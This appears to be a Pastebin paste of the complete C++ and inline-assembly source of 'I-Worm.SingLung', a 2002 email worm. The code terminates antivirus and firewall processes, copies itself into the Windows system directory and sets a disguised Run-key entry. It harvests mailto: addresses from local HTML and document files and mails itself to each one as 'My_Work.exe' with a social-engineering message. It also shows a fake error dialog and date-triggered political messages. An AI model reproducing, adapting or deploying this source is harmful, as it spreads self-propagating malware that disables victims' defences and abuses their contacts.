FlyFar

I-Worm.SingLung - Source Code

Jul 13th, 2023
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 8.39 KB | Cybersecurity | 0 0
  1. /*
  2. Name : I-Worm.SingLung
  3. Author : PetiK
  4. Date : January 23rd 2002 - January 26th 2002
  5. Language : C++/Win32asm
  6.  
  7. Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll);
  8. */
  9.  
  10. #include <stdio.h>
  11. #include <windows.h>
  12. #include <mapi.h>
  13. #include <tlhelp32.h>
  14. #pragma argused
  15. #pragma inline
  16.  
  17.  
  18. char    filename[100],sysdir[100],sysdr[100],winhtm[100];
  19. LPSTR   Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
  20.     SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
  21. int i;
  22. HANDLE  fd,lSnapshot,myproc;
  23. BOOL    rProcessFound;
  24. BYTE    desktop[50],favoris[50],personal[50],cache[50];
  25. DWORD   sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
  26.     sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
  27. DWORD   type=REG_SZ;
  28. FILE    *stopv;
  29.  
  30. LHANDLE session;
  31. MapiMessage mess;
  32. MapiRecipDesc from;
  33. HINSTANCE hMAPI;
  34.  
  35. HKEY        hReg;
  36. PROCESSENTRY32  uProcess;
  37. SYSTEMTIME  systime;
  38. WIN32_FIND_DATA ffile;
  39. HDC     dc;
  40.  
  41. void Welcome();
  42. void StopAV(char *);
  43. void FindFile(char *,char *);
  44. void GetMail(char *,char *);
  45. void sendmail(char *);
  46. void FeedBack();
  47.  
  48. //ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
  49. ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
  50.  
  51.  
  52. int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
  53. {
  54.     /*
  55.     // Worm in RegisterServiceProcess
  56.     HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
  57.     if(kern32) {
  58.         (FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
  59.         if(RegSerPro)
  60.         RegSerPro(NULL,1);
  61.     }   */
  62.  
  63. // Fuck some AntiVirus hahahaha
  64. StopAV("AVP32.EXE");        // AVP
  65. StopAV("AVPCC.EXE");        // AVP
  66. StopAV("AVPM.EXE");     // AVP
  67. StopAV("WFINDV32.EXE");     // Dr. Solomon
  68. StopAV("F-AGNT95.EXE");     // F-Secure
  69. StopAV("NAVAPW32.EXE");     // Norton Antivirus
  70. StopAV("NAVW32.EXE");       // Norton Antivirus
  71. StopAV("NMAIN.EXE");        // Norton Antivirus
  72. StopAV("PAVSCHED.EXE");     // Panda AntiVirus
  73. StopAV("ZONEALARM.EXE");    // ZoneAlarm
  74.  
  75. GetModuleFileName(hInst,filename,100);
  76. GetSystemDirectory((char *)sysdir,100);
  77.  
  78. strcpy(sysdr,sysdir);
  79. strcat(sysdr,"\\MSGDI32.EXE");
  80. if((lstrcmp(filename,sysdr))!=0) {
  81.     Welcome();
  82.     }
  83. else
  84.     {
  85.     hMAPI=LoadLibrary("MAPI32.DLL");
  86.     (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
  87.     RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
  88.     RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
  89.     RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
  90.     RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
  91.     RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
  92.     RegCloseKey(hReg);
  93.     GetWindowsDirectory((char *)winhtm,100);
  94.  
  95. _asm
  96. {
  97. call    @wininet
  98. db  "WININET.DLL",0
  99. @wininet:
  100. call    LoadLibrary
  101. test    eax,eax
  102. jz  end_asm
  103. mov ebp,eax
  104. call    @inetconnect
  105. db  "InternetGetConnectedState",0
  106. @inetconnect:
  107. push    ebp
  108. call    GetProcAddress
  109. test    eax,eax
  110. jz  end_wininet
  111. mov edi,eax
  112. verf:
  113. push    0
  114. push    Tmp
  115. call    edi
  116. dec eax
  117. jnz verf
  118.  
  119. end_wininet:
  120. push    ebp
  121. call    FreeLibrary
  122. end_asm:
  123. jmp end_all_asm
  124.  
  125. Tmp dd 0
  126.  
  127. end_all_asm:
  128. }
  129.  
  130.     FindFile(desktop,"*.htm");
  131.     FindFile(favoris,"*.ht*");
  132.     FindFile(personal,"*.ht*");
  133.     FindFile(personal,"*.doc");
  134.     FindFile(winhtm,".ht*");
  135.     FindFile(cache,".ht*");
  136.     FreeLibrary(hMAPI);
  137.     FeedBack();
  138.     }
  139.  
  140. strcat(sysdir,"\\MsGDI32.exe");
  141. CopyFile(filename,sysdir,FALSE);
  142. RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
  143. RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
  144. RegCloseKey(hReg);
  145.  
  146. }
  147.  
  148. void Welcome()
  149. {
  150. register char fileWel[100],messWel[25],titWel[25];
  151. strcpy(fileWel,filename);
  152. fileWel[0]=0;
  153. for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
  154. wsprintf(titWel,"Error - %s",fileWel+i+1);
  155. wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
  156. MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
  157. }
  158.  
  159.  
  160. void StopAV(char *antivirus)
  161. {
  162. register BOOL term;
  163. lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  164. uProcess.dwSize=sizeof(uProcess);
  165. rProcessFound=Process32First(lSnapshot,&uProcess);
  166. while(rProcessFound) {
  167.     if(strstr(uProcess.szExeFile,antivirus)!=NULL) {    // Norton Antivirus
  168.         myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
  169.         if(myproc!=NULL) {
  170.             term=TerminateProcess(myproc,0);
  171.         }
  172.         CloseHandle(myproc);
  173.     }
  174.     rProcessFound=Process32Next(lSnapshot,&uProcess);
  175. }
  176. CloseHandle(lSnapshot);
  177. }
  178.  
  179.  
  180. void FindFile(char *folder, char *ext)
  181. {
  182. register bool abc=TRUE;
  183. register HANDLE hFile;
  184. char mail[128];
  185. SetCurrentDirectory(folder);
  186. hFile=FindFirstFile(ext,&ffile);
  187. if(hFile!=INVALID_HANDLE_VALUE) {
  188.     while(abc) {
  189.     SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
  190.     GetMail(ffile.cFileName,mail);
  191.     if(strlen(mail)>0) {
  192.     WritePrivateProfileString("EMail found",mail,"send","singlung.txt");
  193.     sendmail(mail);
  194.     }
  195.     abc=FindNextFile(hFile,&ffile);
  196.     }
  197. }
  198.  
  199. }
  200.  
  201. void GetMail(char *namefile, char *mail)
  202. {
  203. HANDLE  hf,hf2;
  204. char    *mapped;
  205. DWORD   size,i,k;
  206. BOOL    test=FALSE,valid=FALSE;
  207. mail[0]=0;
  208.  
  209. hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
  210. if(hf==INVALID_HANDLE_VALUE)
  211.     return;
  212. size=GetFileSize(hf,NULL);
  213. if(!size)
  214.     return;
  215. if(size<8)
  216.     return;
  217. size-=100;
  218.  
  219. hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
  220. if(!hf2) {
  221.     CloseHandle(hf);
  222.     return;
  223.     }
  224.  
  225. mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
  226. if(!mapped) {
  227.     CloseHandle(hf2);
  228.     CloseHandle(hf);
  229.     return;
  230.     }
  231.  
  232. i=0;
  233. while(i<size && !test) {
  234. if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
  235.     test=TRUE;
  236.     i+=strlen("mailto:");
  237.     k=0;
  238.     while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
  239.         if(mapped[i]!=' ') {
  240.             mail[k]=mapped[i];
  241.             k++;
  242.             if(mapped[i]=='@')
  243.                 valid=TRUE;
  244.         }
  245.         i++;
  246.     }
  247.     mail[k]=0;
  248.     } else
  249.     i++;
  250. }
  251.  
  252. if(!valid)
  253.     mail[0]=0;
  254. UnmapViewOfFile(mapped);
  255. CloseHandle(hf2);
  256. CloseHandle(hf);
  257. return;
  258. }
  259.  
  260. void sendmail(char *tos)
  261. {
  262. memset(&mess,0,sizeof(MapiMessage));
  263. memset(&from,0,sizeof(MapiRecipDesc));
  264.  
  265. from.lpszName=NULL;
  266. from.ulRecipClass=MAPI_ORIG;
  267. mess.lpszSubject="Secret for you...";
  268. mess.lpszNoteText="Hi Friend,\n\n"
  269.         "I send you my last work.\n"
  270.         "Mail me if you have some suggests.\n\n"
  271.         "   See you soon. Best Regards.";
  272.  
  273. mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
  274.     if(!mess.lpRecips)
  275.     return;
  276. memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
  277. mess.lpRecips->lpszName=tos;
  278. mess.lpRecips->lpszAddress=tos;
  279. mess.lpRecips->ulRecipClass=MAPI_TO;
  280. mess.nRecipCount=1;
  281.  
  282. mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
  283.     if(!mess.lpFiles)
  284.     return;
  285. memset(mess.lpFiles,0,sizeof(MapiFileDesc));
  286. mess.lpFiles->lpszPathName=filename;
  287. mess.lpFiles->lpszFileName="My_Work.exe";
  288. mess.nFileCount=1;
  289.  
  290. mess.lpOriginator=&from;
  291.  
  292. mSendMail(0,0,&mess,0,0);
  293.  
  294. free(mess.lpRecips);
  295. free(mess.lpFiles);
  296. }
  297.  
  298.  
  299. void FeedBack()
  300. {
  301. GetSystemTime(&systime);
  302. switch(systime.wDay) {
  303. case 7:
  304.     MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
  305.             "With this, you stop the life of women and children.",
  306.             "Message to USA",MB_OK|MB_ICONHAND);
  307.     break;
  308.  
  309. case 11:
  310.     dc=GetDC(NULL);
  311.     if(dc)
  312.     {
  313.     TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
  314.     }
  315.     ReleaseDC(NULL,dc);
  316.     break;
  317.  
  318. case 28:
  319.     stopv=fopen("StopIntifada.htm","w");
  320.     fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n");
  321.     fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
  322.     fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n");
  323.     fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
  324.     fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n");
  325.     fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n");
  326.     fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n");
  327.     fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
  328.     fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
  329.     fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
  330.     fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
  331.     fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
  332.     fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !</font><BR><BR>\n");
  333.     fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
  334.     fprintf(stopv,"</body></html>");
  335.     fclose(stopv);
  336.     ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);
  337.    
  338.     break;
  339. }
  340. }
Tags: internet worm
Add Comment
Please, Sign In to add comment